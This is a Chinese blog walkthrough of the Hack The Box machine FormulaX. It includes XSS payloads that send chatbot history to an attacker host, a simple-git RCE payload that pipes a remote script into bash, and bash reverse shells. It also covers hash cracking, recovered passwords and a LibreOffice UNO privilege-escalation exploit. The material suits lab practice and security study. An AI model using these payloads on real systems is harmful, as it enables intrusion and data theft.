freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

[Meachines][Hard]FormulaX
2024-04-30 20:16:53

Main

$ nmap -sC -sV 10.10.11.6 --min-rate 1000

image.png

# echo '10.10.11.6 formula.htb'>>/etc/hosts

创建一个新用户,登录

image.png

来到聊天窗口,发现普通用户无法使用

image.png

来到联系页面,测试跨站

image.png

{"first_name":"<img src='http://10.10.16.6/s-h4ck13'/>","last_name":"2","message":"2"}

image.png

这里无法获取cookie,因为开启了httponly,

image.png

幸运的是服务器开启了跨域资源访问

image.png

在聊天窗口获取到了Chatbot发送消息的源码

image.png

我们通过XSS对管理员进行CSRF攻击,泄露Chatbot的历史记录

//s-h4ck13.js
//利用Websocket来和机器人交互
const script = document.createElement('script');
script.src = '/socket.io/socket.io.js';
document.head.appendChild(script);
script.addEventListener('load', function() {
	const res = axios.get(`/user/api/chat`);
	const socket = io('/',{withCredentials: true});
	socket.on('message', (my_message) => {
		fetch("http://10.10.16.6/?data=" + my_message)
		});
	socket.emit('client_message', 'history');
});

{"first_name":"<img src=x onerror=\"with(top)body.appendChild (createElement('script')).src='http://10.10.16.6/s-h4ck13.js'\">","last_name":"2","message":"2"}

利用管理员身份获取了Chatbot的历史记录

image.png

image.png

获取到了一个新的子域名

# echo '10.10.11.6 dev-git-auto-update.chatbot.htb'>>/etc/hosts

image.png

image.png

通过漏洞库搜索Simple-git在3.15之前存在一个RCE漏洞
CVE-2022-25912
image.png

image.png

const simpleGit = require('simple-git')
const git2 = simpleGit()
git2.clone('ext::sh -c touch% /tmp/pwn% >&2', '/tmp/example-new-repo', ["-c", "protocol.ext.allow=always"]);
# reverse.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.16.6/10032 0>&1

在Remote Git Url栏中输入payload

ext::sh -c curl% http://10.10.16.6/reverse.sh|bash

image.png

$ netstat -lnput

可以看到MariaDB(3306),mongoDB(27017)数据库开放,我们在web目录下寻找数据库配置文件

image.png

$ find ./ -type f -name '*db*' | while read -r file; do filename=$(basename "$file") if [ ${#filename} -le 15 ]; then echo "$file" fi done

image.png

$ cat ./app/configuration/connect_db.js

image.png

我们没有访问MariaDB的权限,但是可以访问mongoDB

image.png

> use testing
> show collections
> db.users.find()

image.png

image.png

恰好frank_dorky用户也存在该主机

$2b$10$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7s.elpsB4J6

$ echo "\$2b\$10\$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7s.elpsB4J6">hash

$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt

image.png

image.png

username:frank_dorky
password:manchesterunited

image.png

User Flag

$ cat /home/frank_dorky/user.txt

image.png

e079c692881778c3880454b025b906b0

Root Flag

权限不足

image.png

$ netstat -lnput

在之前3000端口上开放了一个web服务

image.png

image.png

我们通过ssh进行隧道代理把3000端口映射到kali

[kali]

$ ssh -L 3000:127.0.0.1:3000 frank_dorky@10.10.11.6

image.png

https://github.com/librenms/librenms
LibreNMS 是一个开源的网络监控系统,用于监控网络设备、服务器和服务的性能和状态。它提供了广泛的功能,包括自动发现、性能图表、警报通知、日志记录和自定义报告等,可帮助网络管理员和运维人员实时监控和管理其网络基础设施
image.png

在/opt/librenms 目录有一些LibreNMS官方提供调试脚本,可供测试

但是frank_dorky用户和www-data用户均无法ls读取这个目录内文件,但是可以进入该目录执行脚本

image.png

$ ./validate.php

可以确定版本是22.10.0

image.png

在披露中,我们可以通过/opt/librenms/config_to_json.php来获取数据库的配置

image.png

kai_relay这个用户在我们的/etc/passwd也存在

image.png

username:kai_relay
password:mychemicalformulaX

再次通过ssh登录kai_relay用户

image.png

$ groups;id;sudo -l

image.png

$ cat /usr/bin/office.sh

image.png

在无界面模式下启动 LibreOffice 或 OpenOffice 的 Calc(电子表格程序),并且通过指定的端口接受连接请求,不恢复以前的文档,不显示 logo,并且不使用默认模板。

将exp.py上传到服务器

# exp.py
#! /usr/bin/env python3
import uno
from com.sun.star.system import XSystemShellExecute

local = uno.getComponentContext()
resolver = local.ServiceManager.createInstanceWithContext("com.sun.star.bridge.UnoUrlResolver", local)
context = resolver.resolve("uno:socket,host=localhost,port=2002;urp;StarOffice.ComponentContext")
rc = context.ServiceManager.createInstance("com.sun.star.system.SystemShellExecute")
rc.execute("bash", "/tmp/reverse.sh", 1)
# reverse.sh
bash -i >& /dev/tcp/10.10.16.6/10034 0>&1

[靶机]
$ cd /tmp
$ curl http://10.10.16.6/exp.py -O;chmod +x exp.py
$ curl http://10.10.16.6/reverse.sh -O;chmod +x reverse.sh
image.png
$ sudo /usr/bin/office.sh
image.png

再开一个ssh

$ cd /tmp
$ netstat -lnput
可以看到127.0.0.1:2002开放了
$ python3 exp.py

image.png

image.png

838cf791e70b35799984bae602e49f0e

在/opt/librenms中存在一个添加用户的php文件,你可以用./addUser.php username password来进行添加用户,然后对3000端口web服务进行getshell,但是对于本实验中没有太大的用处

# 渗透测试 # 黑客 # 网络安全 # web安全 # CTF
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者